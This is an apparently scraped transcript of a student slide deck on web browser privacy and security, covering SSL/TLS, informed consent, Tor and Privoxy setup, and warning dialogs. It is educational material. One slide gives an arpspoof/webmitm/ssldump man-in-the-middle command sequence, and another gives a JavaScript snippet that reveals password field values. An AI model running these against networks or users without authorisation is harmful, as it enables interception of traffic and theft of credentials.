Web Browser Privacy and Security - PowerPoint PPT Presentation

About This Presentation
Title:

Web Browser Privacy and Security

Description:

Web Browser Privacy and Security. Dhruv Mohindra (MSISPM)? Usable Privacy Security, Spring 08 ... Expose tutorials and links so that others are satisfied ... – PowerPoint PPT presentation

Number of Views:159
Avg rating:3.0/5.0
Slides: 27
Provided by: ACE5188
Learn more at: http://cups.cs.cmu.edu
Category:

less

Transcript and Presenter's Notes

Title: Web Browser Privacy and Security


1
1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1
1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1
1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1
1 0 1 1 1 0 1 1 0 1 1 0
Web Browser Privacy and Security
Dhruv Mohindra (MSISPM)? Usable Privacy
Security, Spring 08
2
1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1
1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1
1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1
Agenda
  • Web Browsing and 'The User'
  • Technology Overview
  • Security Concerns
  • Privacy Matters
  • Recent Developments
  • Suggestions

1 0 1 1 1 0 1
3
1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1
1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1
1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1
Agenda
  • Web Browsing and 'The User'
  • Technology Overview
  • Security Concerns
  • Privacy Matters
  • Recent Developments
  • Suggestions

1 0 1 1 1 0 1
4
1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1
1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1
1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1
A Model For Informed Consent
1 0 1 1 1 0 1
Source Informed Consent by Design(Friedman, Lin,
Miller)?
5
1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1
1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1
1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1
Agreement Revisited...
1 0 1 1 1 0 1
6
1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1
1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1
1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1
On the other hand...
1 0 1 1 1 0 1
7
1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1
1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1
1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1
But with Web Browsers...
  • None of the approaches work
  • - One is too intrusive, the other too lax
  • It is a good idea to reveal simple and required
    features
  • - The vast population just wants to browse the
    Internet
  • Hide complexity underneath, advanced users can
    find it
  • - Expose tutorials and links so that others
    are satisfied
  • Strike a trade-off between security and
    usability
  • - Recovering Stored Passwords in Firefox

1 0 1 1 1 0 1
8
1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1
1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1
1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1
Towards Better Usability...
Javascript( function()? var s,F,j,f,i s
"" F document.forms for(j0 jltF.length
j) f Fj for (i0 iltf.length
i) if (fi.type.toLowerCase()
"password") s fi.value "\n"
if (s) alert("Passwords in forms on this
page\n\n" s) else alert("There are no
passwords in forms on this page.") )()
1 0 1 1 1 0 1
9
1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1
1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1
1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1
Agenda
  • Web Browsing and 'The User'
  • Technology Overview
  • Security Concerns
  • Privacy Matters
  • Recent Developments
  • Suggestions

1 0 1 1 1 0 1
10
1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1
1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1
1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1
Secure Sockets Layer (SSL/TLS)?
  • Set of cryptographic protocols
  • that provide secure
  • communications on the
  • Internet, for applications
  • Designed to protect from
  • eavesdropping, tampering,
  • replay and packet forgery.
  • SSL/TLS Implementations do
  • not signify secure places but
  • security in 'transit'.

1 0 1 1 1 0 1
Image Source http//www.windowsitpro.com
11
1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1
1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1
1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1
Agenda
  • Web Browsing and 'The User'
  • Technology Overview
  • Security Concerns
  • Privacy Matters
  • Recent Developments
  • Suggestions

1 0 1 1 1 0 1
12
1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1
1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1
1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1
Exercise
  • How many people feel that they are safe while
    browsing
  • non TLS(SSL)-enabled websites?
  • Have you every questioned someone about how SSL
  • works and how you are safe with it? Or do you
    take
  • technology for granted because everyone says
    Use SSL
  • to browse securely?

1 0 1 1 1 0 1
13
1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1
1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1
1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1
1 0 1 1 1 0 1
Demonstration
14
1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1
1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1
1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1
Man-in-the-middle Attack
1 0 1 1 1 0 1
Source http//www.acm.org/crossroads/xrds11-1/gfx
/figure2-wifi.jpg
15
1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1
1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1
1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1
Man-in-the-middle Attack
  • SSL/TLS can be defeated with Social Engineering
  • Run the following commands (with permission)-
  • - arpspoof -t victim gateway
  • - arpspoof -t gateway victim
  • - echo 1 gt /proc/sys/net/ipv4/ip_forward
  • - wireshark
  • - webmitm -dd
  • - ssldump -n -d -k webmitm.crt tee
    ssldump.log
  • Where,
  • victim is the IP address of the victim computer
  • gateway is the IP address of the gateway
  • (arpspoof utility comes with the dsniff package)?

1 0 1 1 1 0 1
16
1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1
1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1
1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1
Agenda
  • Web Browsing and 'The User'
  • Technology Overview
  • Security Concerns
  • Privacy Matters
  • Recent Developments
  • Suggestions

1 0 1 1 1 0 1
17
1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1
1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1
1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1
Anonymous Browsing
  • What constitutes anonymity on the Internet?
  • - Hiding the IP address
  • - Disabling exchange of cookies
  • - Other personally identifiable information
  • TOR (The Onion Router)?
  • - Routes traffic through three mix proxies by
    default
  • - The sender encrypts a message thrice
  • - Due to layered encryption, it is called
    Onion Routing
  • - You are safer as long people in your
    anonymity set
  • are non-identifiable
  • - TOR is a SOCKS proxy and thus requires
    Privoxy
  • - Privoxy handles http, https data and DNS
    lookups
  • then passes traffic to TOR via a SOCKS
    connection

1 0 1 1 1 0 1
18
1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1
1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1
1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1
TOR Caveats
  • False sense of completion
  • - Sometimes users mistakenly feel protected
    while they
  • are not
  • Using TOR without Privoxy
  • - Configuring a browser to use TOR as its
    SOCKS
  • proxy doesn't work due to DNS lookups/leaks
  • Execution of Client-side code
  • - Enabling Java, Javascript, Flash or ActiveX
    is very
  • dangerous.
  • At first glance the whole system is difficult to
    grasp
  • - No clear description of how tor, Vidalia,
    Privoxy work
  • - No clear message that Privoxy is to run on
    port 8118
  • while TOR on 9050 (useful when configuring
    browser)?

1 0 1 1 1 0 1
19
1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1
1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1
1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1
FoxTor on Linux
  • TOR, Privoxy and FoxTor installed gracefully
  • - Compiled source packages as usual and
    installed the
  • Firefox extension using the web browser.
  • Configuration of Privoxy was tricky
  • - forward-socks4a / 127.0.0.19050 ., line
    had to be
  • added in /etc/privoxy/config. Not mentioned in
    docs.
  • - It would be nice to have FoxTor's 'help'
    have these
  • descriptions
  • Runtime Issues
  • - FoxTor continues to say You are now Masked
    even
  • when one has turned off either Privoxy or
    tor.
  • - The user may not realize the real source of
    the
  • problem and may try fiddling with FoxTor
    instead

1 0 1 1 1 0 1
20
1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1
1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1
1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1
Agenda
  • Web Browsing and 'The User'
  • Technology Overview
  • Security Concerns
  • Privacy Matters
  • Recent Developments
  • Suggestions

1 0 1 1 1 0 1
21
1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1
1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1
1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1
Recent Developments
  • Context Sensitive Certificate Verification
  • - Clarify relationship between user and server
  • - Uses tokens and modifies web browsers
  • - Displays a series of alert
    boxes...complicated?
  • - Do you have information on removable
    media?
  • - Are you internal member of Org. that owns
    server?
  • - Doesn't help avoid dangers with public
    websites
  • - Denial of Service
  • Specific Password Warnings
  • - Alert user while sending unencrypted
    passwords
  • - Series of confirmation windows again...
  • - User Study participants are more careful
    when you
  • tell them Do not visit websites you
    consider too
  • risky

1 0 1 1 1 0 1
22
1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1
1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1
1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1
Agenda
  • Web Browsing and 'The User'
  • Technology Overview
  • Security Concerns
  • Privacy Matters
  • Recent Developments
  • Suggestions

1 0 1 1 1 0 1
23
1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1
1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1
1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1
Context Sensitive Dialog Boxes
1 0 1 1 1 0 1
24
1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1
1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1
1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1
Context Sensitive Dialog Boxes
1 0 1 1 1 0 1
- Covey application or website specific risk -
More intuitive and easy to understand - Users
can click 'x' to dismiss anytime - 'Learn More'
is default, curious users will click at first
instinct - Conveys the initial meaning without
any verbose statements - Tailor according to
skill set of user, ask at browser installation
time - Change images while adapting to user's
daily usage and preferences
25
1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1
1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1
1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1
1 0 1 1 1 0 1
Conclusion
26
1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1
1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1
1 0 1 1 1 0 1 1 0 1 0 1 1 0 1 1
1 0 1 1 1 0 1
Questions
Write a Comment
User Comments (0)
About PowerShow.com